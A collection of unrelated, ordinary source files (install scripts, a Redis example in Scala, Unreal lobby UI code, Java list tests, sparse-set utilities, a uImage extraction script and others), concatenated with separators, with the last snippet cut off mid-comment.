# Unpack and point a stable "mpg123" symlink at the versioned directory.
tar xjf mpg123-$VERSION.tar.bz2 || exit 1
rm -fr mpg123
ln -s mpg123-$VERSION mpg123
# Build a static, audio-output-less mpg123 installed into its own directory.
(
cd mpg123
./configure --prefix `pwd` --with-default-audio=dummy --enable-static --disable-shared
make; make install
)
# Append MPG123/PATH exports to env.sh unless they are already present.
(
set +u
[ ! -z "${MPG123}" ] && \
echo >&2 "MPG123 variable is aleady defined. Undefining..." && \
unset MPG123
[ -f ./env.sh ] && . ./env.sh
[ ! -z "${MPG123}" ] && \
echo >&2 "MPG123 config is already in env.sh" && exit
wd=`pwd`
wd=`readlink -f $wd || pwd`
echo "export MPG123=$wd/mpg123"
echo "export PATH=\${PATH}:\${MPG123}/bin"
) >> env.sh
echo >&2 "Installation of MPG123 finished successfully"
echo >&2 "Please source the tools/extras/env.sh in your path.sh to enable it"
|
import io.chrisdavenport.rediculous._
import cats.implicits._
import cats.effect._
import fs2.io.net._
import com.comcast.ip4s._
// Send a Single Transaction to the Redis Server
object TransactionExample extends IOApp {
// Entry point: build a queued Redis connection, run one transaction
// (PING, DEL, GET, SET, GET on key "foo"), print the result, then exit.
def run(args: List[String]): IO[ExitCode] = {
val r = for {
// maxQueued: How many elements before new submissions semantically block. Tradeoff of memory to queue jobs.
// Default 1000 is good for small servers. But can easily take 100,000.
// workers: How many threads will process pipelined messages.
connection <- RedisConnection.queued[IO].withMaxQueued(maxQueued = 10000).build
} yield connection
r.use {client =>
// Compose the five commands applicatively with .tupled so they are
// submitted together, then run them as a single MULTI/EXEC transaction.
val r = (
RedisCommands.ping[RedisTransaction],
RedisCommands.del[RedisTransaction]("foo"),
RedisCommands.get[RedisTransaction]("foo"),
RedisCommands.set[RedisTransaction]("foo", "value"),
RedisCommands.get[RedisTransaction]("foo")
).tupled
val multi = r.transact[IO]
multi.run(client).flatTap(output => IO(println(output)))
}.as(ExitCode.Success)
}
}
|
<gh_stars>0
// Fill out your copyright notice in the Description page of Project Settings.
#include "LobbyPlayerController.h"
#include "JamGameInstance.h"
#include "Runtime/UMG/Public/Blueprint/UserWidget.h"
// Create the lobby HUD and in-lobby menu widgets for the local player.
// The HUD starts visible and the menu starts collapsed; ShowInLobbyMenu /
// HideInLobbyMenu toggle between them afterwards.
void ALobbyPlayerController::SetupLobbyUI()
{
if (IsLocalPlayerController())
{
// Both widget classes must be assigned (e.g. in a Blueprint subclass).
if (LobbyHUDWidgetClass && InLobbyMenuWidgetClass)
{
LobbyHUDWidget = UUserWidget::CreateWidgetOfClass(LobbyHUDWidgetClass.Get(), GetGameInstance(), GetWorld(), this); // Create Widget
if (LobbyHUDWidget)
{
LobbyHUDWidget->AddToViewport();
LobbyHUDWidget->SetVisibility(ESlateVisibility::Visible);
}
InLobbyMenuWidget = UUserWidget::CreateWidgetOfClass(InLobbyMenuWidgetClass.Get(), GetGameInstance(), GetWorld(), this); // Create Widget
if (InLobbyMenuWidget)
{
InLobbyMenuWidget->AddToViewport();
InLobbyMenuWidget->SetVisibility(ESlateVisibility::Collapsed);
}
}
}
}
void ALobbyPlayerController::ShowInLobbyMenu()
{
if (InLobbyMenuWidget)
{
if (LobbyHUDWidget)
{
InLobbyMenuWidget->SetVisibility(ESlateVisibility::Visible);
LobbyHUDWidget->SetVisibility(ESlateVisibility::Collapsed);
FInputModeUIOnly Mode;
Mode.SetLockMouseToViewportBehavior(EMouseLockMode::DoNotLock);
SetInputMode(Mode);
bShowMouseCursor = true;
}
}
}
void ALobbyPlayerController::HideInLobbyMenu()
{
if (InLobbyMenuWidget)
{
if (LobbyHUDWidget)
{
InLobbyMenuWidget->SetVisibility(ESlateVisibility::Collapsed);
LobbyHUDWidget->SetVisibility(ESlateVisibility::Visible);
FInputModeUIOnly Mode;
Mode.SetLockMouseToViewportBehavior(EMouseLockMode::DoNotLock);
SetInputMode(Mode);
bShowMouseCursor = true;
}
}
}
// The lobby UI counts as initialized once both widgets have been created.
bool ALobbyPlayerController::IsLobbyUIInitialized() const
{
	return LobbyHUDWidget != nullptr && InLobbyMenuWidget != nullptr;
}

// True only when the UI exists and the in-lobby menu is currently collapsed.
bool ALobbyPlayerController::IsInLobbyMenuCollapsed() const
{
	if (!IsLobbyUIInitialized())
	{
		return false;
	}
	return InLobbyMenuWidget->GetVisibility() == ESlateVisibility::Collapsed;
}
// Implementation of the RemoveLobbyWidgets event (the _Implementation suffix
// suggests a UFUNCTION net/Blueprint event declared in the header — confirm).
// Collapses both lobby widgets, returns input control to the game with the
// cursor hidden, and asks the game instance to refresh monster status.
void ALobbyPlayerController::RemoveLobbyWidgets_Implementation()
{
if (GetLobbyHUDWidget())
{
GetLobbyHUDWidget()->SetVisibility(ESlateVisibility::Collapsed);
}
if (GetInLobbyMenuWidget())
{
GetInLobbyMenuWidget()->SetVisibility(ESlateVisibility::Collapsed);
}
// Switch from UI-only back to game-only input.
FInputModeGameOnly Mode{};
Mode.SetConsumeCaptureMouseDown(false);
SetInputMode(Mode);
bShowMouseCursor = false;
UJamGameInstance* GI{ Cast<UJamGameInstance>(GetGameInstance()) };
if (ensure(GI))
{
GI->LobbyUpdatePlayersMonsterStatusLocal();
}
}
|
#include <iostream>
#include <string>
// Request object for paginated project queries; the app name is mirrored
// into an HTTP-style body parameter when it is set.
class PaginateProjectRequest {
private:
    std::string appName_;  // application the request targets

public:
    // Store the application name and expose it as the "AppName" body parameter.
    void setAppName(const std::string& appName) {
        appName_ = appName;
        setBodyParameter("AppName", appName);
    }

    // Derive the namespace for the configured application.
    std::string get_NameSpace() const {
        // Implement logic to retrieve namespace
        return "namespace_for_" + appName_; // Sample implementation
    }

    // Record a key/value pair destined for the request body (stub: logs it).
    void setBodyParameter(const std::string& key, const std::string& value) {
        // Implement setting body parameter logic
        std::cout << "Setting body parameter: " << key << " = " << value << std::endl; // Sample implementation
    }
};
// Coordinates paginated display of project items and forwards the application
// name to the underlying PaginateProjectRequest.
class PaginationManager {
private:
int pageSize_;   // items per page (stored; not yet used by the display stubs)
int totalItems_; // total item count (stored; not yet used by the display stubs)
int currentPage_; // 1-based page currently shown
std::string appName_;
PaginateProjectRequest paginateProjectRequest_;
public:
void setPageSize(int pageSize) {
pageSize_ = pageSize;
}
void setTotalItems(int totalItems) {
totalItems_ = totalItems;
}
void setCurrentPage(int currentPage) {
currentPage_ = currentPage;
}
// Stores the app name and propagates it to the wrapped request object.
void setAppName(const std::string& appName) {
appName_ = appName;
paginateProjectRequest_.setAppName(appName_);
}
// Stub: real item rendering is not implemented yet.
void displayCurrentPageItems() {
// Implement logic to display items for the current page
std::cout << "Displaying items for page " << currentPage_ << std::endl; // Sample implementation
}
// Stub: real pagination controls are not implemented yet.
void displayPaginationControls() {
// Implement logic to display pagination controls
std::cout << "Displaying pagination controls" << std::endl; // Sample implementation
}
};
int main() {
PaginationManager paginationManager;
paginationManager.setPageSize(10);
paginationManager.setTotalItems(100);
paginationManager.setCurrentPage(1);
paginationManager.setAppName("SampleApp");
paginationManager.displayCurrentPageItems();
paginationManager.displayPaginationControls();
return 0;
}
|
import java.util.ArrayList;
import java.util.LinkedList;
import java.util.ListIterator;
/**
 * Exercises ArrayList and LinkedList behaviour (iteration, insertion,
 * removal, growth) with simple expectations; throws RuntimeException on the
 * first failed check.
 */
public class List {
    // Minimal assertion helper: fail fast on any unexpected result.
    private static void expect(boolean v) {
        if (! v) throw new RuntimeException();
    }

    // Renders the list as "a, b, c". Returns "" for an empty list instead of
    // crashing on the negative setLength the previous version performed.
    private static String printList(ArrayList<Integer> list) {
        StringBuilder sb = new StringBuilder();
        for (Integer i : list) {
            sb.append(i);
            sb.append(", ");
        }
        if (sb.length() >= 2) {
            sb.setLength(sb.length() - 2);
        }
        return sb.toString();
    }

    // Prints s1 and asserts it equals s2.
    private static void isEqual(String s1, String s2) {
        System.out.println(s1);
        expect(s1.equals(s2));
    }

    // Validates forward/backward ListIterator traversal from every start index.
    private static void testIterators(java.util.List<Integer> l) {
        l.add(1);
        l.add(2);
        l.add(3);
        ListIterator<Integer> it = l.listIterator();
        expect(it.next().equals(Integer.valueOf(1)));
        expect(it.next().equals(Integer.valueOf(2)));
        expect(it.next().equals(Integer.valueOf(3)));
        expect(! it.hasNext());
        it = l.listIterator(1);
        expect(it.next().equals(Integer.valueOf(2)));
        expect(it.next().equals(Integer.valueOf(3)));
        expect(! it.hasNext());
        it = l.listIterator(2);
        expect(it.next().equals(Integer.valueOf(3)));
        expect(! it.hasNext());
        it = l.listIterator(3);
        expect(it.previous().equals(Integer.valueOf(3)));
        expect(it.previous().equals(Integer.valueOf(2)));
        expect(it.previous().equals(Integer.valueOf(1)));
        expect(! it.hasPrevious());
        it = l.listIterator(2);
        expect(it.previous().equals(Integer.valueOf(2)));
        expect(it.previous().equals(Integer.valueOf(1)));
        expect(! it.hasPrevious());
        it = l.listIterator(1);
        expect(it.previous().equals(Integer.valueOf(1)));
        expect(! it.hasPrevious());
    }

    // Validates ListIterator.remove() in both traversal directions.
    private static void testIterators2(java.util.List<Integer> l) {
        l.add(1);
        l.add(2);
        l.add(3);
        ListIterator<Integer> it = l.listIterator();
        expect(it.next().equals(Integer.valueOf(1)));
        it.remove();
        expect(it.next().equals(Integer.valueOf(2)));
        it.remove();
        expect(it.next().equals(Integer.valueOf(3)));
        it.remove();
        expect(! it.hasNext());
        expect(l.isEmpty());
        l.add(1);
        l.add(2);
        l.add(3);
        it = l.listIterator(1);
        expect(it.next().equals(Integer.valueOf(2)));
        it.remove();
        expect(it.next().equals(Integer.valueOf(3)));
        it.remove();
        expect(! it.hasNext());
        expect(l.size() == 1);
        l.add(2);
        l.add(3);
        it = l.listIterator(2);
        expect(it.next().equals(Integer.valueOf(3)));
        it.remove();
        expect(! it.hasNext());
        expect(l.size() == 2);
        l.add(3);
        it = l.listIterator(3);
        expect(it.previous().equals(Integer.valueOf(3)));
        it.remove();
        expect(it.previous().equals(Integer.valueOf(2)));
        it.remove();
        expect(it.previous().equals(Integer.valueOf(1)));
        it.remove();
        expect(! it.hasPrevious());
        expect(l.isEmpty());
        l.add(1);
        l.add(2);
        l.add(3);
        it = l.listIterator(2);
        expect(it.previous().equals(Integer.valueOf(2)));
        it.remove();
        expect(it.previous().equals(Integer.valueOf(1)));
        it.remove();
        expect(! it.hasPrevious());
        expect(l.size() == 1);
        l.clear();
        l.add(1);
        l.add(2);
        l.add(3);
        it = l.listIterator(1);
        expect(it.previous().equals(Integer.valueOf(1)));
        it.remove();
        expect(! it.hasPrevious());
        expect(l.size() == 2);
    }

    // Forces two capacity growths of an ArrayList created with capacity 2.
    private static void testGrow() {
        ArrayList<Integer> foo = new ArrayList<Integer>(2);
        foo.add(0);
        foo.add(1);
        foo.add(2); // first grow
        foo.add(3);
        foo.add(4); // second grow
        foo.add(5);
        for (int i = 0; i < foo.size(); i++) {
            expect(i == foo.get(i));
        }
    }

    // Removes elements by value while iterating over a separate list.
    private static void testRemove() {
        ArrayList<String> foo = new ArrayList<String>(2);
        foo.add("Uno");
        foo.add("Dos");
        foo.add("Tres");
        foo.add("Cuatro");
        ArrayList<String> fooToRemove = new ArrayList<String>(2);
        fooToRemove.add(foo.get(0));
        fooToRemove.add(foo.get(1));
        for (String s : fooToRemove) {
            foo.remove(s);
        }
        expect(foo.size() == 2);
    }

    public static void main(String args[]) {
        ArrayList<Integer> l = new ArrayList<Integer>();
        l.add(1); l.add(2); l.add(3); l.add(4); l.add(5);
        isEqual(printList(l), "1, 2, 3, 4, 5");
        l.add(0, 6);
        isEqual(printList(l), "6, 1, 2, 3, 4, 5");
        l.add(2, 7);
        isEqual(printList(l), "6, 1, 7, 2, 3, 4, 5");
        l.remove(1);
        isEqual(printList(l), "6, 7, 2, 3, 4, 5");
        l.add(6, 8);
        isEqual(printList(l), "6, 7, 2, 3, 4, 5, 8");
        Integer[] ints = new Integer[15];
        Integer[] z = l.toArray(ints);
        expect(z == ints);
        for (int i=0; i < z.length; i++) {
            System.out.println(z[i]);
        }
        // Use parameterised types instead of the raw ArrayList/LinkedList the
        // previous version passed (eliminates unchecked-conversion warnings).
        testIterators(new ArrayList<Integer>());
        testIterators(new LinkedList<Integer>());
        testIterators2(new ArrayList<Integer>());
        testIterators2(new LinkedList<Integer>());
        testGrow();
        testRemove();
    }
}
|
#!/bin/sh
#
# Copyright (C) 2010 Matthias Buecher (http://www.maddes.net/)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# http://www.gnu.org/licenses/gpl-2.0.txt
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Path of the uImage file to dissect (first CLI argument).
UIMAGE=$1
# check for uImage magic word
# http://git.denx.de/cgi-bin/gitweb.cgi?p=u-boot.git;a=blob;f=include/image.h
echo 'Checking for uImage magic word...'
# The first 4 bytes of a uImage must be the u-boot magic 0x27051956.
MAGIC=`dd if="${UIMAGE}" ibs=4 count=1 | hexdump -v -e '1/1 "%02X"'`
[ '27051956' != "${MAGIC}" ] && { echo 'Not an uImage.' ; exit 1 ; }
# extract data from uImage
echo 'uImage recognized.'
echo 'Extracting data...'
DATAFILE='uImage.data'
# Skip the 64-byte uImage header; the remainder is the payload.
dd if="${UIMAGE}" of="${DATAFILE}" ibs=64 skip=1
# check for ARM mach type ( xx 1C A0 E3 xx 10 81 E3 )
# http://www.simtec.co.uk/products/SWLINUX/files/booting_article.html#d0e600
echo 'Checking for ARM mach-type...'
MAGIC=`dd if="${DATAFILE}" ibs=1 skip=1 count=3 | hexdump -v -e '1/1 "%02X"'`
[ '1CA0E3' = "${MAGIC}" ] && {
	MAGIC=`dd if="${DATAFILE}" ibs=1 skip=5 count=3 | hexdump -v -e '1/1 "%02X"'`
	[ '1081E3' = "${MAGIC}" ] && {
		echo 'ARM mach-type header recognized.'
		echo 'Extracting mach-type header...'
		dd if="${DATAFILE}" of="uImage.mach-type" ibs=8 count=1
		ARCH=$(hexdump -v -e '1/1 "%02X "' uImage.mach-type); echo "The mach-type is: $ARCH"
		echo 'Stripping mach-type header...'
		TMPFILE='uImage.tmp'
		# Drop the leading 8-byte mach-type preamble from the payload.
		dd if="${DATAFILE}" of="${TMPFILE}" ibs=8 skip=1
		rm -f "${DATAFILE}"
		mv "${TMPFILE}" "${DATAFILE}"
	}
}
# check for zImage, otherwise assume Image
# http://www.simtec.co.uk/products/SWLINUX/files/booting_article.html#d0e309
TMPFILE='Image'
echo 'Checking for zImage...'
# The zImage magic (0x016F2818, little-endian on disk) lives at word 9.
MAGIC=`dd if="${DATAFILE}" ibs=4 skip=9 count=1 | hexdump -v -e '1/1 "%02X"'`
[ '18286F01' = "${MAGIC}" ] && {
	START=`dd if="${DATAFILE}" ibs=4 skip=10 count=1 | hexdump -v -e '1/4 "%08X"'`
	END=`dd if="${DATAFILE}" ibs=4 skip=11 count=1 | hexdump -v -e '1/4 "%08X"'`
	#
	SIZE=$(( 0x${END} - 0x${START} ))
	#
	echo "zImage recognized with start 0x${START}, end 0x${END} and size ${SIZE}."
	TMPFILE='zImage'
}
mv "${DATAFILE}" "${TMPFILE}"
echo ">>> ${UIMAGE} extracted to ${TMPFILE}"
|
#!/bin/bash
# Collect genesis transactions with the containerised ununifid, then restore
# ownership of the bind-mounted home directory to the invoking user.
date
docker run -it -v ~/.ununifi:/root/.ununifi ghcr.io/ununifi/ununifid:test ununifid collect-gentxs
sudo chown -c -R $USER:docker ~/.ununifi
date
|
/**
 * Fixed-capacity sparse set over Uint32 values in [0, length).
 *
 * `cursor` is the number of live elements; dense[0..cursor-1] hold the
 * members. Fixes vs the previous version:
 *  - count() returned cursor + 1 (1 for an empty set);
 *  - remove() read dense[cursor], one past the last live element, so the
 *    swap-with-last compaction used a stale slot;
 *  - has(0) was true on a fresh set because typed arrays are zero-filled;
 *    the sparse index is now bounds-checked against cursor.
 */
export const Uint32SparseSet = (length) => {
  const dense = new Uint32Array(length)
  const sparse = new Uint32Array(length)
  let cursor = 0
  // Number of live elements.
  dense.count = () => cursor
  // Membership: the slot must be inside the live region and round-trip.
  const has = val => sparse[val] < cursor && dense[sparse[val]] === val
  const add = val => {
    if (has(val)) return
    sparse[val] = cursor
    dense[cursor] = val
    cursor++
  }
  const remove = val => {
    if (!has(val)) return
    // Shrink first so `cursor` indexes the last live element, then move it
    // into the vacated slot (unless we removed that element itself).
    cursor--
    const index = sparse[val]
    const swapped = dense[cursor]
    if (swapped !== val) {
      dense[index] = swapped
      sparse[swapped] = index
    }
  }
  return {
    add,
    remove,
    has,
    sparse,
    dense,
  }
}
/**
 * Growable sparse set backed by plain arrays; removal compacts the dense
 * array by swapping the last element into the vacated slot.
 */
export const SparseSet = () => {
  const dense = []
  const sparse = []

  // Custom sort keeps sparse[] consistent after dense[] is reordered.
  dense.sort = function (comparator) {
    const sorted = Array.prototype.sort.call(this, comparator)
    dense.forEach((val, i) => { sparse[val] = i })
    return sorted
  }

  const has = (val) => dense[sparse[val]] === val

  const add = (val) => {
    if (has(val)) return
    const index = dense.push(val) - 1
    sparse[val] = index
  }

  const remove = (val) => {
    if (!has(val)) return
    const index = sparse[val]
    const last = dense.pop()
    if (last !== val) {
      // Fill the hole with the popped element and fix its sparse index.
      dense[index] = last
      sparse[last] = index
    }
  }

  return { add, remove, has, sparse, dense }
}
|
# frozen_string_literal: true
module Qernel
  module NodeApi
    # Various helper methods for setting demand of nodes from GQL.
    module DemandHelpers
      # Relative tolerance used by #demand_expected?.
      EXPECTED_DEMAND_TOLERANCE = 0.001

      # Updates a (power plant) node demand by its electricity output.
      #
      # That means we have to divide by the conversion of the electricity slot. So that the
      # electricity output edge receive that value, otherwise one part would go away to losses.
      #
      # For example:
      #
      #   UPDATE(... , preset_demand_by_electricity_production, 1000)
      #
      #   1000 electricity --> +------+
      #                        | 1030 |
      #            30 loss --> +------+
      #
      def preset_demand_by_electricity_production=(value)
        set_preset_demand_by_carrier_production(value, :electricity)
      end

      # Updates a (hydrogen production plant) node demand by its hydrogen output.
      #
      # That means we have to divide by the conversion of the hydrogen slot. So that the hydrogen
      # output edge receive that value, otherwise one part would go away to losses.
      #
      # For example:
      #
      #   UPDATE(... , preset_demand_by_hydrogen_production, 1000)
      #
      #   1000 hydrogen --> +------+
      #                     | 1030 |
      #         30 loss --> +------+
      #
      def preset_demand_by_hydrogen_production=(value)
        set_preset_demand_by_carrier_production(value, :hydrogen)
      end

      # Is the calculated near the demand_expected_value?
      #
      # Returns nil if demand or expected is nil. Returns true if demand is within tolerance
      # EXPECTED_DEMAND_TOLERANCE.
      def demand_expected?
        expected = demand_expected_value
        return nil if demand.nil? || expected.nil?

        # Both values are rounded to four decimals before comparing; two zeros
        # compare equal without triggering the division below.
        actual = demand.round(4)
        expected = expected.round(4)
        return true if actual.to_f.zero? && expected.to_f.zero?

        (actual.to_f / expected - 1.0).abs < EXPECTED_DEMAND_TOLERANCE
      end

      private

      # Sets node.preset_demand so that the named carrier output equals +value+,
      # compensating for the slot conversion (losses). Raises when the node has
      # no output slot for +carrier_key+.
      def set_preset_demand_by_carrier_production(value, carrier_key)
        output_slot = node.output(carrier_key)

        unless output_slot
          raise "UPDATE: preset_demand_by_#{carrier_key}_production could not find " \
                "#{carrier_key} output for #{key.inspect}"
        end

        node.preset_demand = value / output_slot.conversion
      end
    end
  end
end
|
/**
 * Left-pads `str` (stringified) with repetitions of `pad` until it is
 * `length` characters long.
 *
 * Returns the stringified input unchanged when it is already long enough or
 * when `length` is missing/zero — the previous version threw a RangeError
 * (`Array(NaN)` / negative size) in those cases.
 */
export const lpad = function(str, pad, length){
  const _str = "" + str;
  if (!length || _str.length >= length) {
    return _str;
  }
  return Array((length + 1) - _str.length).join(pad) + _str;
}
|
#!/bin/bash
# Git tree-ish (branch/tag/commit) to build; defaults to HEAD.
TREEISH=$1
if [ "$TREEISH" == "" ]; then
	TREEISH="HEAD"
fi
# Suppress interactive apt prompts for unattended installs.
export DEBIAN_FRONTEND=noninteractive
# Print an error message and abort the script with a non-zero status.
function die {
	# Quote the arguments so the message is not word-split or glob-expanded.
	echo "$@"
	exit 1
}
# Refresh the apt package index (dist-upgrade intentionally left disabled).
function pre_setup {
	apt-get update > /dev/null
	#apt-get dist-upgrade -y
}
# Install the toolchain and libraries required to build bro from source.
function install_prereqs {
	apt-get -y install build-essential git zsync
	apt-get -y install bison flex cmake swig gawk
	apt-get -y install libssl-dev libgeoip-dev libmagic-dev libpcap-dev python-dev libcurl4-openssl-dev
	apt-get -y install geoip-database-contrib
}
# Build and install bro from source into /usr/local/bro; no-op when the
# binary is already present.
function install_bro {
	if [ -e /usr/local/bro/bin/bro ] ; then
		echo "bro already installed"
		return
	fi
	cd /usr/src/
	# Prefer a pre-seeded tarball, otherwise clone the upstream repository.
	if [ -e /tmp/bro.tgz ]; then
		tar xzf /tmp/bro.tgz
		rm /tmp/bro.tgz
	else
		git clone --recursive git://git.bro.org/bro
	fi
	cd bro
	git fetch origin $TREEISH
	git pull
	git checkout $TREEISH || die "checkout failed"
	git submodule update --recursive --init
	#overkill?
	# Discard any local modifications in the tree and all submodules.
	git reset --hard
	git submodule foreach --recursive git reset --hard
	git checkout .
	git submodule foreach --recursive git checkout .
	./configure || die "configure failed"
	make -j2 || die "build failed"
	sudo make install || die "install failed"
	make clean
	#change ownership to bro user
	chown -R bro: /usr/src/bro
}
# Create convenience symlinks (/bro, /bro/site, /exercises) and expose the
# bro binaries on login shells' PATH. All steps are idempotent.
function configure_bro {
	if [ ! -e /bro ]; then
		ln -s /usr/local/bro /bro
	fi
	if [ ! -e /bro/site ]; then
		(cd /bro ; ln -s share/bro/site . )
	fi
	echo 'export PATH=$PATH:/bro/bin' > /etc/profile.d/bro.sh
	# Guard this link like the others so a re-run does not abort the script
	# (set -e style failure on "File exists") — it was unconditional before.
	if [ ! -e /exercises ]; then
		ln -s /home/bro/exercises /exercises
	fi
}
# Run the provisioning phases in order; each phase aborts via die() on error.
pre_setup
install_prereqs
install_bro
configure_bro
exit 0
|
# Python3 program to find LCM of two numbers
# method to return gcd of a and b
def gcd(a, b):
    """Return the greatest common divisor of a and b (Euclidean algorithm)."""
    # Iterative form of the classic recursion gcd(b % a, a).
    while a != 0:
        a, b = b % a, a
    return b
# method to return LCM of two numbers
def lcm(a, b):
    """Return the least common multiple of a and b.

    lcm(0, 0) is defined as 0; the previous version raised
    ZeroDivisionError because gcd(0, 0) == 0.
    """
    if a == 0 and b == 0:
        return 0
    return (a*b) // gcd(a, b)
|
#!/bin/bash
# Use the repository root as the Go workspace.
export GOPATH=$PWD
# Install the project's pre-commit hook on first run (idempotent).
if [ ! -f .git/hooks/pre-commit ]; then
	chmod +x hooks/pre-commit
	ln -s ../../hooks/pre-commit .git/hooks/
fi
|
import re
from typing import List

import numpy as np
def process_chinese_sentences(file_path: str) -> List[List[str]]:
    """Read a space-tokenised corpus and return its sentences, shuffled.

    Each line of ``file_path`` becomes one sentence: the line is stripped,
    split on runs of spaces, and empty tokens are dropped (a blank line
    yields an empty sentence). Sentence order is randomised in place with
    ``np.random.shuffle``.

    Note: the ``List`` annotation previously raised NameError because
    ``typing.List`` was never imported; the import block now provides it.
    """
    sents = []
    with open(file_path, 'r', encoding='utf-8') as f:
        # Iterate the file object directly instead of materialising readlines().
        for line in f:
            sents.append(line.strip())
    sents = [re.split(' +', s) for s in sents]  # Split sentences into words based on spaces
    sents = [[w for w in s if w] for s in sents]  # Remove empty strings from the sentences
    np.random.shuffle(sents)  # Shuffle the sentences
    return sents
|
#!/usr/bin/env bash
# Print a short summary of what this installer will do.
function describe_actions() {
	echo " 📦 Install the latest pass package from Homebrew"
	echo " 🛠 Configure syncing of the passwordstore database"
}
# Install pass via Homebrew and link its database into the dotfiles repo
# unless a configuration directory already exists.
function install() {
	install_homebrew_package "pass"
	local -r pass_config_path="$HOME/.password-store"
	if [ -d "$pass_config_path" ]; then
		echo "Passwordstore configuration already exists at $pass_config_path"
	else
		echo "Symlinking passwordstore configuration to $DOTFILES_BASE_PATH..."
		ln -s "$DOTFILES_BASE_PATH/.password-store" "$pass_config_path"
	fi
}
|
<reponame>wuximing/dsshop<gh_stars>0
// Generated webpack chunk for the order-detail page of the user centre;
// prefer editing the original component source over this bundle.
exports.ids = [69];
exports.modules = {

/***/ 296:
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
__webpack_require__.r(__webpack_exports__);
/* harmony import */ var _api_goodIndent__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(22);
/* harmony default export */ __webpack_exports__["default"] = ({
  layout: 'user',
  head() {
    return {
      title: '订单详情-个人中心'
    };
  },
  data() {
    return {
      loading: true,
      buttonLoading: false,
      total: 0,
      indent: {}
    };
  },
  mounted() {
    this.getDetail();
  },
  methods: {
    // Loads the order identified by the `id` query parameter, sums the order
    // total and builds a ';'-joined SKU specification string per item.
    async getDetail() {
      if (!$nuxt.$route.query.id) {
        this.$message({
          message: '参数有误,请联系管理员',
          type: 'error'
        });
        $nuxt.$router.go(-1);
        return false;
      }
      await Promise.all([Object(_api_goodIndent__WEBPACK_IMPORTED_MODULE_0__[/* detail */ "e"])($nuxt.$route.query.id)]).then(([indentData]) => {
        this.indent = indentData;
        this.total = 0;
        let specification = null;
        this.indent.goods_list.forEach(item => {
          this.total += item.price * item.number;
          // NOTE(review): assumes product_sku is non-empty whenever good_sku
          // is set; otherwise substr() below runs on null — verify upstream.
          if (item.good_sku) {
            specification = null;
            item.good_sku.product_sku.forEach(item2 => {
              if (specification) {
                specification += item2.value + ';';
              } else {
                specification = item2.value + ';';
              }
            });
            item.specification = specification.substr(0, specification.length - 1);
          }
        });
        this.total = Number(this.total.toFixed(2));
        this.loading = false;
      }).catch(error => {
        this.loading = false;
      });
    },
    // Confirm receipt of the order after user confirmation.
    confirmReceipt() {
      this.$confirm('是否确认收货?', '提示', {
        confirmButtonText: '确认',
        cancelButtonText: '取消',
        type: 'warning'
      }).then(() => {
        this.buttonLoading = true;
        Object(_api_goodIndent__WEBPACK_IMPORTED_MODULE_0__[/* receipt */ "i"])(this.indent.id).then(response => {
          this.buttonLoading = false;
          this.$message({
            message: '操作成功',
            type: 'success'
          });
          this.getDetail();
        }).catch(() => {
          this.buttonLoading = false;
        });
      }).catch(() => {});
    },
    goBack() {
      $nuxt.$router.go(-1);
    }
  }
});

/***/ })

};;
//# sourceMappingURL=detail.js.map
|
$(function(){
    // Scrollable region (mui widget)
    mui('.mui-scroll-wrapper').scroll({
        deceleration: 0.0005 // flick deceleration; larger = slower/shorter scrolling (default 0.0006)
    });
    // Fetch the data for the left-hand (top-level category) list
    $.ajax({
        url:'/category/queryTopCategory',
        type:'get',
        success:function(result){
            // Render the rows through the template engine
            var str = template('leftListTpl',{data:result.rows});
            // Inject the markup into the left-hand list container
            $('#leftListBox').html(str);
            // If top-level categories exist, load the second-level list and
            // select the first entry by default
            if(result.rows[0].total != 0){
                // Fetch second-level categories for the first entry
                getSecondData(result.rows[0].id);
                $('#leftListBox li').eq(0).addClass('active');
            }
        }
    });
    // Clicking a left-hand item loads its second-level categories
    $('#leftListBox').on('click','li',function(){
        // Read the category id from the data-id attribute for the backend query
        var id = $(this).data('id');//$(this).attr('data-id');
        // Load and display the second-level categories
        getSecondData(id);
        $(this).addClass('active').siblings().removeClass('active');
    });
    // Fetches the second-level categories for the given top-level id
    function getSecondData(id){
        $.ajax({
            url:'/category/querySecondCategory',
            type:'get',
            data:{
                id:id
            },
            success:function(result){
                var str = template('rightListTpl',{data:result.rows});
                $('#rightListBox').html(str);
            }
        });
    }
})
|
# Point JAVA_HOME at the locally installed JDK 8 (update the path on upgrade).
export JAVA_HOME=/usr/java/jdk1.8.0_40
|
#!/bin/bash
cd "$(dirname "${BASH_SOURCE[0]}")" \
&& source "utils.sh"
###############################################################################
# SSH and Github
###############################################################################
# Copy the SSH public key to the clipboard and open the Github keys page.
# Relies on $pub being set by the caller (ssh_key_setup) via bash dynamic
# scoping.
copy_key_github() {
	# adapted for WSL2
	inform 'Public key copied! Paste into Github…'
	local os=""
	os="$(get_os)"
	if [[ "$os" == "macOS" ]]; then
		# Quote $pub and feed pbcopy directly (the previous `cat $pub | pbcopy`
		# was an unquoted useless-cat).
		[[ -f "$pub" ]] && pbcopy < "$pub"
		open 'https://github.com/settings/keys'
	elif [[ "$os" == ubuntu ]] && check_wsl; then
		# in WSL; Windows apps are available
		[[ -f "$pub" ]] && < "$pub" /mnt/c/Windows/System32/clip.exe
		wslview "https://github.com/settings/keys"
	else
		# unsure of OS
		print_warning "Unsure of OS; please enter key into Github manually."
	fi
	read -r -p " ✦ Press enter to continue…"
	print_success "SSH key"
	return
}
# Offer to copy an existing SSH public key into Github.
github_key_check() {
	if ask "SSH key found. Enter it in Github?" Y; then
		copy_key_github;
	else
		print_success "SSH key";
	fi
}
# Interactively generate a new ed25519 key pair, then offer the Github upload.
create_ssh_key() {
	if ask "No SSH key found. Create one?" Y; then
		ssh-keygen -t ed25519; github_key_check;
	else
		return 0;
	fi
}
# Branch on whether an ed25519 public key already exists; $pub stays visible
# to the called functions through bash dynamic scoping.
ssh_key_setup() {
	local pub=$HOME/.ssh/id_ed25519.pub
	if ! [[ -f $pub ]]; then
		create_ssh_key
	else
		github_key_check
	fi
}
# Script entry point.
main() {
	chapter "Setup Github SSH keys"
	ssh_key_setup
}
main
|
// Floating "+<value>" score text: spawned at (x, y), it drifts upward while
